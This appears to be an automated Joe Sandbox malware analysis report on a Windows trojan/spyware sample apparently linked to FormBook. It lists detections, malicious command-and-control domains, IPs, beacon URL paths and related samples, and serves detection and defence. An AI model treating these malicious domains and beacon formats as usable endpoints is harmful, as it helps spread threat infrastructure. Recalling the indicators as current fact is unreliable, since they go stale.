Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
A4mmSHCUi2.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Spynoon
A4mmSHCUi2.exe	37%	Virustotal		Browse
A4mmSHCUi2.exe	100%	Avira	HEUR/AGEN.1309540
A4mmSHCUi2.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.pridegrove.net	0%	Virustotal	Browse
www.030002107.xyz	1%	Virustotal	Browse
budged.net	1%	Virustotal	Browse
www.5hdgb2p9a.buzz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.pridegrove.net	172.67.217.184	true	true	0%, Virustotal, Browse	unknown
www.030002107.xyz	161.97.142.144	true	true	1%, Virustotal, Browse	unknown
budged.net	195.154.200.15	true	true	1%, Virustotal, Browse	unknown
www.5hdgb2p9a.buzz	168.76.221.252	true	true	1%, Virustotal, Browse	unknown
roopiedutech.online	103.191.208.137	true	true		unknown
plazerdigital.store	162.240.81.18	true	true		unknown
www.newhopetoday.app	216.40.34.41	true	true		unknown
www.marketplacer.top	194.58.112.174	true	true		unknown
mjmegartravel.online	76.223.67.189	true	true		unknown
d21dk.top	154.23.184.185	true	true		unknown
www.thesquare.world	13.248.169.48	true	true		unknown
www.sonoscan.org	13.248.169.48	true	true		unknown
www.nuvisio.top	162.0.211.143	true	true		unknown
www.awarnkishesomber.space	188.114.97.3	true	true		unknown
www.75e296qdx.top	unknown	unknown	false		unknown
www.budged.net	unknown	unknown	false		unknown
www.mjmegartravel.online	unknown	unknown	false		unknown
www.plazerdigital.store	unknown	unknown	false		unknown
www.d21dk.top	unknown	unknown	false		unknown
www.roopiedutech.online	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
http://www.budged.net/5p40/	true	unknown
http://www.newhopetoday.app/qbij/	true	unknown
http://www.marketplacer.top/d4tr/	true	unknown
http://www.d21dk.top/fo10/	true	unknown
http://www.awarnkishesomber.space/rmi6/	true	unknown
http://www.thesquare.world/f1ri/	true	unknown
http://www.nuvisio.top/mkt0/	true	unknown
http://www.mjmegartravel.online/b8r1/	true	unknown
http://www.plazerdigital.store/6qe4/	true	unknown
http://www.030002107.xyz/e8he/	true	unknown
http://www.roopiedutech.online/u8o6/	true	unknown
http://www.pridegrove.net/tasm/	true	unknown
http://www.sonoscan.org/p6wx/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reg.ru	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.instagram.com/hover_domains	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/?	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.tiro.com	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hover.com/email?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.hover.com/about?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nginx.net/	nslookup.exe, 0000000B.00000002.4109044096.0000000004C92000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000004032000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/staff/dennis.htm	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hover.com/domains/results	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://fedoraproject.org/	nslookup.exe, 0000000B.00000002.4109044096.0000000004C92000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000004032000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&reg_source=parking_auto	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.zhongyicts.com.cn	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	A4mmSHCUi2.exe, 00000000.00000002.1669584077.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000000.00000002.1680016256.0000000005B44000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.hover.com/tools?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://help.hover.com/home?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.hover.com/domain_pricing?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.hover.com/privacy?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitter.com/hover	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.roopiedutech.online	wioTZtEQwu.exe, 0000000C.00000002.4110076229.0000000005621000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://www.hover.com/transfer_in?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.hover.com/renew?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hover.com/tos?source=parked	nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/sozdanie-saita/	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers8	A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h	nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hover.com/?source=parked	wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.240.81.18	plazerdigital.store	United States	46606	UNIFIEDLAYER-AS-1US	true
13.248.169.48	www.thesquare.world	United States	16509	AMAZON-02US	true
76.223.67.189	mjmegartravel.online	United States	16509	AMAZON-02US	true
162.0.211.143	www.nuvisio.top	Canada	35893	ACPCA	true
172.67.217.184	www.pridegrove.net	United States	13335	CLOUDFLARENETUS	true
161.97.142.144	www.030002107.xyz	United States	51167	CONTABODE	true
168.76.221.252	www.5hdgb2p9a.buzz	South Africa	265240	ULTRANETSERVICOSEMINTERNETLTDABR	true
188.114.97.3	www.awarnkishesomber.space	European Union	13335	CLOUDFLARENETUS	true
103.191.208.137	roopiedutech.online	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
154.23.184.185	d21dk.top	United States	174	COGENT-174US	true
194.58.112.174	www.marketplacer.top	Russian Federation	197695	AS-REGRU	true
195.154.200.15	budged.net	France	12876	OnlineSASFR	true
216.40.34.41	www.newhopetoday.app	Canada	15348	TUCOWSCA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547300
Start date and time:	2024-11-02 05:24:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	A4mmSHCUi2.exe renamed because original name is a hash value
Original Sample Name:	53becf41ba02fdbc491515ba9cf6cc96.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/7@15/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 93 Number of non-executed functions: 290
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:24:55	API Interceptor	2x Sleep call for process: A4mmSHCUi2.exe modified
00:24:57	API Interceptor	16x Sleep call for process: powershell.exe modified
00:26:04	API Interceptor	10728678x Sleep call for process: nslookup.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.240.81.18	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.plazerdigital.store/bliu/
	General terms and conditions of sale - Valid from 10202024 to 12312024.exe	Get hash	malicious	FormBook	Browse	www.monitoraseg.online/rhit/?jB=Ci+YPC7xCxWf08kirrECgkEBIZY5HBNSRFv3CTjM6hz7NJLOSqQBtD2OpMfaBJXXgumDHCn77b433vmRuiTFPaIofoXZCY42jfT34z4fdyscWWheCA==&ldz=rxiD0VSh
	5FRWRDOqk7.exe	Get hash	malicious	FormBook	Browse	www.7hubmt.online/emo9/?HPBxr6=oPccInOcLW+EI5jrrceY/ewrwgxXrc4JkjweiNgc/kWOxsCKI255hst+ACEh0p0xsWZvo67cJNMZibMfXcRa95lcQDmke9aYFdxVrYc8QNt1O7+LoA==&-hF=sZ0LOH4
	PO#001498.exe	Get hash	malicious	FormBook	Browse	www.monitoraseg.online/l90v/
	r9856_7.exe	Get hash	malicious	FormBook	Browse	www.jeandreo.store/a5gd/
	PDF PURCHASE INQUIRY PDF.exe	Get hash	malicious	FormBook	Browse	www.7hubmt.online/xbib/
	MV ALIADO-S-REQ-19-000640.exe	Get hash	malicious	FormBook	Browse	www.7hubmt.online/xbib/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.sorriragora.online/3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr
	DHL airwaybill # 6913321715 & BL Draft copy.exe	Get hash	malicious	FormBook	Browse	www.sorriragora.online/wxmz/
	yyyyyyyy.exe	Get hash	malicious	FormBook	Browse	www.bellaflory.online/ituf/?zx=TzUh&EN-hu=YEtZDn0tA7DyZih9mnEB6iyoKUlvFjNFey9C//wFiDDFSyoO5eWV3ZKTc+ZVO1r+PL1l+P0OBuxLEWCpqZjHLSt270GmuGdydD8IJidQLk1z2EFl8w==
13.248.169.48	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.discountprice.shop/mt2s/
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	www.ila.beauty/izfe/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.hopeisa.live/0iqe/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.ila.beauty/izfe/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.xipowerplay.xyz/akxn/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.xipowerplay.xyz/akxn/
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	www.yanta.org/1nfd/
	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.tangible.online/5byq/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.telforce.one/ykhz/
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	www.proworker.shop/0z5y/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.newhopetoday.app	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	216.40.34.41
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	216.40.34.41
	10145202485.vbs	Get hash	malicious	GuLoader	Browse	216.40.34.41
www.pridegrove.net	DHL TRACKING.exe	Get hash	malicious	FormBook	Browse	104.21.45.179

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	armv7l.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	sparc.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	sh4.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	m68k.elf	Get hash	malicious	Unknown	Browse	54.72.82.152
	mpsl.elf	Get hash	malicious	Mirai	Browse	52.51.102.56
	arm6.elf	Get hash	malicious	Unknown	Browse	44.229.86.230
	ppc.elf	Get hash	malicious	Mirai	Browse	3.252.173.5
	x86_32.elf	Get hash	malicious	Gafgyt	Browse	34.223.35.250
	debug.dbg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	108.155.200.100
	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse	34.249.145.219
UNIFIEDLAYER-AS-1US	TROODOS AIR PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.144.157
	COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.144.157
	https://docsend.com/view/yvdhrcvq4c4p7xrd	Get hash	malicious	HTMLPhisher	Browse	192.185.25.60
	w9ap9yNeCb.exe	Get hash	malicious	AgentTesla	Browse	192.185.13.234
	https://woobox.com/sf4hxr	Get hash	malicious	HTMLPhisher	Browse	50.116.86.34
	https://hotmail.cdisaomiguel.com.br	Get hash	malicious	Unknown	Browse	108.179.193.134
	original.eml	Get hash	malicious	Mamba2FA	Browse	108.179.193.134
	https://t.ly/4Nq2x	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	192.185.17.40
	Indocount Invoice Amendment.exe	Get hash	malicious	FormBook	Browse	162.241.63.77
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	162.240.81.18
AMAZON-02US	armv7l.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	sparc.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	sh4.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	m68k.elf	Get hash	malicious	Unknown	Browse	54.72.82.152
	mpsl.elf	Get hash	malicious	Mirai	Browse	52.51.102.56
	arm6.elf	Get hash	malicious	Unknown	Browse	44.229.86.230
	ppc.elf	Get hash	malicious	Mirai	Browse	3.252.173.5
	x86_32.elf	Get hash	malicious	Gafgyt	Browse	34.223.35.250
	debug.dbg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	108.155.200.100
	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse	34.249.145.219
ACPCA	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	FACTURA - FOB-78787-5677__________________pif.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
	Se adjuntan los documentos de env#U00edo originales DHL.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	jew.x86.elf	Get hash	malicious	Mirai	Browse	162.54.84.226
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	162.0.211.143

Process:	C:\Users\user\Desktop\A4mmSHCUi2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
